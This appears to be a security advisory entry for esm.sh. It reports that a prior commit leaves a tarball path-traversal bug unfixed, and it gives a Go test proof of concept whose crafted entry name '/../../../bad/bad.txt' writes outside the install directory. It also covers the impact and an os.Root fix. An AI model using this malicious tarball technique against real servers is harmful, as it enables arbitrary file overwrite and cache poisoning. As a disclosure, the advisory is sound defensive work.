+ "details": "### Summary\n\nThe [commit](https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16) does not actually fix the path traversal bug. `path.Clean` basically normalizes a path but does not prevent absolute paths in a malicious tar file.\n\n### PoC\n\nThis test file can demonstrate the basic idea pretty easily:\n\n```go\npackage server\n\nimport (\n\t\"archive/tar\"\n\t\"bytes\"\n\t\"compress/gzip\"\n\t\"testing\"\n)\n\n// TestExtractPackageTarball_PathTraversal tests the extractPackageTarball function\n// with a malicious tarball containing a path traversal attempt\nfunc TestExtractPackageTarball_PathTraversal(t *testing.T) {\n\t// Create a temporary directory for testing\n\tinstallDir := \"./testdata/good\"\n\n\t// Create a malicious tarball with path traversal\n\tvar buf bytes.Buffer\n\tgw := gzip.NewWriter(&buf)\n\ttw := tar.NewWriter(gw)\n\n\t// Add a normal file\n\tcontent := []byte(\"export const foo = 'bar';\")\n\theader := &tar.Header{\n\t\tName: \"package/index.js\",\n\t\tMode: 0644,\n\t\tSize: int64(len(content)),\n\t\tTypeflag: tar.TypeReg,\n\t}\n\tif err := tw.WriteHeader(header); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif _, err := tw.Write(content); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Add a malicious file with path traversal\n\tbad := []byte(\"bad\")\n\theader = &tar.Header{\n\t\tName: \"/../../../bad/bad.txt\",\n\t\tMode: 0644,\n\t\tSize: int64(len(bad)),\n\t\tTypeflag: tar.TypeReg,\n\t}\n\tif err := tw.WriteHeader(header); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif _, err := tw.Write(bad); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\ttw.Close()\n\tgw.Close()\n\n\t// Call extractPackageTarball with the malicious tarball\n\tif err := extractPackageTarball(installDir, \"test-package\", bytes.NewReader(buf.Bytes())); err != nil {\n\t\tt.Errorf(\"extractPackageTarball returned error: %v\", err)\n\t}\n}\n```\n\n### Impact\n\nIt, at the very least, seems to enable overwriting the esm.sh configuration file and poisoning cached packages.\n\nArbitrary file write _can_ lead to server-side code execution (e.g. Writing to cron files) but it may not be feasible for the default deployment configuration that is checked in. Whether some self-hosted configuration is modified to _enable_ code execution is unclear.\n\nThe limiting factors in the default setup that limit escalating this to code execution:\n\n - `extractPackageTarball` has a file-extension check which makes some more \"obvious\" escalations like overwriting binaries in `/esm/bin` (e.g. `deno`) impractical since it requires the target file to have an allowlisted extension.\n - Using the `Dockerfile` in the repo as a baseline for the typical setup: The binary does not run as root and, for the most part, can really only write to `/tmp` and it's home directory.\n - The deployment scripts do not seem to rely on executing potentially poisoned files in `/tmp.\n\n### Fix\n\nUsing [`os.Root`](https://go.dev/blog/osroot) seems like it will solve this issue and doesn't require new dependencies.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments